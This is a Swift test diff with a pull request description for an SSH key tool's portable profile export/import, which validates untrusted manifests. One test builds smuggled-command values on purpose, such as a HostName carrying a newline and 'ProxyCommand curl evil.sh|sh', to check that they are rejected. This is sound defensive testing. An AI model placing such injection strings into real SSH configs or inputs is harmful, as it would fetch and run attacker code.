+          RemoteForward 9000 localhost:9000
+        """
+        let dropped = Profile.droppedDirectives(forAlias: "web", in: config)
+        XCTAssertEqual(dropped, ["ProxyJump", "ForwardAgent"])
+        XCTAssertFalse(dropped.contains("RemoteForward"), "stops at the next Host block")
+        XCTAssertFalse(dropped.joined().contains("bastion"), "values are never captured")
+        XCTAssertTrue(Profile.droppedDirectives(forAlias: "missing", in: config).isEmpty)
+    }
+
     // MARK: - Config generation
 
     func testConfigTextAppendsBlocksUsingLocalPaths() {

--- a/Tests/FobKitTests/ProfileTests.swift
+++ b/Tests/FobKitTests/ProfileTests.swift
@@ -1,0 +1,156 @@
+import Foundation
+import XCTest
+
+@testable import FobKit
+
+final class ProfileTests: XCTestCase {
+    private func sampleKey(_ name: String, policy: KeyPolicy = KeyPolicy()) -> Profile.Key {
+        Profile.Key(name: name, policy: policy)
+    }
+
+    private func sampleHost(_ alias: String, key: String, host: String = "example.com",
+                            user: String = "deploy", port: Int = 22) -> Profile.Host {
+        Profile.Host(alias: alias, hostName: host, user: user, port: port,
+                     keyName: key, isGitHost: false)
+    }
+
+    // MARK: - Round-trip
+
+    /// The manifest must survive JSON exactly — including a *default* policy, which the store
+    /// represents as "no record" but the profile has to state explicitly.
+    func testRoundTripPreservesPoliciesIncludingDefault() throws {
+        let profile = Profile(
+            exportedAt: "2026-01-01T00:00:00Z",
+            keys: [
+                sampleKey("plain"),
+                Profile.Key(name: "pinned",
+                            policy: KeyPolicy(pinnedHostKeys: [Data([1, 2, 3])], reuseSeconds: 30,
+                                              allowedNamespaces: ["git"], namespaceChoiceMade: true,
+                                              requireBiometry: true),
+                            oldFingerprint: "SHA256:abc", signsCommits: true,
+                            signingEmail: "me@example.com"),
+            ],
+            hosts: [sampleHost("web", key: "plain")],
+            signing: Profile.Signing(allowedSignersFile: "~/.ssh/allowed_signers"))
+
+        let data = try JSONEncoder().encode(profile)
+        let decoded = try JSONDecoder().decode(Profile.self, from: data)
+
+        XCTAssertEqual(decoded, profile)
+        XCTAssertTrue(decoded.keys[0].policy.isDefault, "an open policy round-trips as open")
+        XCTAssertEqual(decoded.keys[1].policy.requireBiometry, true, "protection level survives")
+        XCTAssertEqual(decoded.keys[1].policy.pinnedHostKeys, [Data([1, 2, 3])], "pins survive")
+    }
+
+    /// A profile must never carry key material. This is the property the whole design rests on.
+    func testEncodedProfileContainsNoPrivateKeyFields() throws {
+        let profile = Profile(exportedAt: "t", keys: [sampleKey("k")], hosts: [])
+        let json = String(decoding: try JSONEncoder().encode(profile), as: UTF8.self).lowercased()
+        for forbidden in ["privatekey", "datarepresentation", "secret", "begin openssh"] {
+            XCTAssertFalse(json.contains(forbidden), "profile leaked '\(forbidden)'")
+        }
+    }
+
+    // MARK: - Validation (the manifest is untrusted input)
+
+    func testValidateAcceptsCleanProfile() {
+        let profile = Profile(exportedAt: "t", keys: [sampleKey("web")],
+                              hosts: [sampleHost("web", key: "web")])
+        XCTAssertTrue(profile.validate().isEmpty)
+    }
+
+    /// `configBlock` interpolates verbatim, so a newline would inject ssh directives and a leading
+    /// dash would later be read as an ssh option. Both must be refused before anything is written.
+    func testValidateRejectsInjectionAndUnsafeTokens() {
+        let profile = Profile(
+            exportedAt: "t",
+            keys: [sampleKey("ok")],
+            hosts: [
+                Profile.Host(alias: "evil", hostName: "example.com\n  ProxyCommand curl evil.sh|sh",
+                             user: "deploy", port: 22, keyName: "ok", isGitHost: false),
+                Profile.Host(alias: "-oProxyCommand=x", hostName: "example.com",
+                             user: "deploy", port: 22, keyName: "ok", isGitHost: false),
+                Profile.Host(alias: "tabs", hostName: "example.com", user: "de\tploy",
+                             port: 22, keyName: "ok", isGitHost: false),
+                Profile.Host(alias: "badport", hostName: "example.com", user: "deploy",
+                             port: 99999, keyName: "ok", isGitHost: false),
+            ])
+        let issues = profile.validate()
+        XCTAssertEqual(issues.count, 4, "each unsafe field is reported: \(issues)")
+        XCTAssertTrue(issues.allSatisfy {
+            if case .invalidHostField = $0 { return true } else { return false }
+        })
+    }
+
+    func testValidateRejectsBadKeyNamesDuplicatesAndDanglingReferences() {
+        let profile = Profile(
+            exportedAt: "t",
+            keys: [sampleKey("../escape"), sampleKey("dup"), sampleKey("dup")],
+            hosts: [sampleHost("orphan", key: "missing")])
+        let issues = profile.validate()
+        XCTAssertTrue(issues.contains(.invalidKeyName("../escape")), "\(issues)")
+        XCTAssertTrue(issues.contains(.duplicateKeyName("dup")), "\(issues)")
+        XCTAssertTrue(issues.contains(.unknownKeyReference(alias: "orphan", keyName: "missing")), "\(issues)")
+    }
+
+    func testValidateRejectsNewerSchema() {
+        let profile = Profile(version: Profile.currentVersion + 1, exportedAt: "t",
+                              keys: [], hosts: [])
+        XCTAssertTrue(profile.validate().contains(.unsupportedVersion(Profile.currentVersion + 1)))
+    }
+
+    // MARK: - Planning
+
+    func testPlanSkipsExistingKeysAndHosts() {
+        let profile = Profile(
+            exportedAt: "t",
+            keys: [sampleKey("fresh"), sampleKey("already")],
+            hosts: [sampleHost("newhost", key: "fresh"), sampleHost("oldhost", key: "already")])
+        let existingConfig = "Host oldhost\n  HostName old.example\n"
+
+        let plan = profile.plan(existingKeys: ["already"], existingConfig: existingConfig)
+
+        XCTAssertEqual(plan.keysToCreate.map(\.name), ["fresh"])
+        XCTAssertEqual(plan.keysSkipped, ["already"], "never overwrite an existing key")
+        XCTAssertEqual(plan.hostsToAdd.map(\.alias), ["newhost"])
+        XCTAssertEqual(plan.hostsSkipped.map(\.alias), ["oldhost"])
+    }
+
+    /// Same CWE-706 rule the migrate/adopt flows enforce: a block shared by several patterns must
+    /// not be touched, since editing it rewrites the siblings' auth too.
+    func testPlanRefusesSharedHostLine() {
+        let profile = Profile(exportedAt: "t", keys: [sampleKey("k")],
+                              hosts: [sampleHost("web", key: "k")])
+        let plan = profile.plan(existingKeys: [],
+                                existingConfig: "Host web staging\n  HostName shared.example\n")
+        XCTAssertTrue(plan.hostsToAdd.isEmpty)
+        XCTAssertEqual(plan.hostsSkipped.first?.alias, "web")
+        XCTAssertTrue(plan.hostsSkipped.first?.reason.contains("staging") == true,
+                      "names the sibling it would have clobbered")
+    }
+
+    // MARK: - Config generation
+
+    func testConfigTextAppendsBlocksUsingLocalPaths() {
+        let hosts = [sampleHost("web", key: "web"),
+                     sampleHost("db", key: "web", host: "db.example", user: "root", port: 2222)]
+        let text = Profile.configText(applying: hosts, to: "Host existing\n  HostName e.example\n",
+                                      socketPath: "/Users/new/.fob/agent.sock",
+                                      pubPath: { "/Users/new/.ssh/fob_\($0).pub" })
+
+        XCTAssertTrue(text.hasPrefix("Host existing"), "existing config preserved")
+        XCTAssertTrue(text.contains("Host web"))
+        XCTAssertTrue(text.contains("Host db"))
+        XCTAssertTrue(text.contains("\n  Port 2222\n"), "non-default port carried")
+        XCTAssertFalse(text.contains("\n  Port 22\n"), "default port omitted, as configBlock does")
+        XCTAssertTrue(text.contains("IdentityAgent /Users/new/.fob/agent.sock"))
+        XCTAssertTrue(text.contains("IdentityFile /Users/new/.ssh/fob_web.pub"))
+        XCTAssertFalse(text.contains("/Users/old/"), "no path from the exporting machine")
+    }
+
+    func testConfigTextIsUnchangedWithNoHosts() {
+        let original = "Host a\n  HostName a.example\n"
+        XCTAssertEqual(Profile.configText(applying: [], to: original,
+                                          socketPath: "/s", pubPath: { "/\($0)" }), original)
+    }
+}


### PR DESCRIPTION
Secure Enclave keys physically can't leave the Mac that made them — but everything *around* them can. This adds a portable, **no-key-material** profile so "I got a new Mac" stops meaning "recreate nine keys by hand and remember which went where."

## What moves
`fob export-profile` writes `fob-profile.json` (0600): key **names**, **policies** (pins, reuse windows, namespaces, protection level), the `~/.ssh/config` **host mappings**, and the **signing** setup. No private material of any kind — the file is a map, not a key.

`fob import-profile` on the new Mac: validates → plans → shows the config diff and asks → creates **fresh** enclave keys under the same names at the same protection level → restores policies → writes the config once (with backup) → re-lists signing keys in `allowed_signers` → prints a **registration checklist** per key (provider deep-link or `ssh-copy-id` line, plus the retired key's fingerprint so old entries can be pruned).

## Three commits
1. **Persist the protection level** — `requireBiometry` was only ever a creation-time flag, unrecoverable from the blob; without recording it, an import would silently downgrade Touch-ID-only keys to any-user-presence. Now in `KeyPolicy` (back-compat optional), and rotation carries policies via a new `carryPolicy` that keeps the *replacement's* level.
2. **FobKit `Profile`** — versioned Codable manifest + pure `validate`/`plan`/`configText`. A profile is untrusted input: names/hosts are re-validated (newline-in-HostName injection and leading-dash options are refused), collisions are skipped not overwritten, shared `Host a b` lines are refused (CWE-706), and the config is built in one pass so the per-second backup can't overwrite itself.
3. **CLI commands** + `usage` stanzas (help is fob's only discovery surface).

## Verification
- **131 tests pass** (+11): manifest round-trip incl. default policies, injection rejection, plan collisions/siblings, golden config, dropped-directive scoping, fail-closed on unreadable policy.
- Real-world: exported this machine's 9 keys / 7 hosts — policies intact, **leak-check clean** (no private-key markers in the JSON), re-import on the same Mac is a no-op, malicious profiles refused outright.

## Honest limits (also in --help)
The new Mac gets **new** keys that must be registered (checklist provided). Config directives fob doesn't model (`ProxyJump`, …) are reported by name, never carried — their values can hold internal hosts and this file travels between machines.
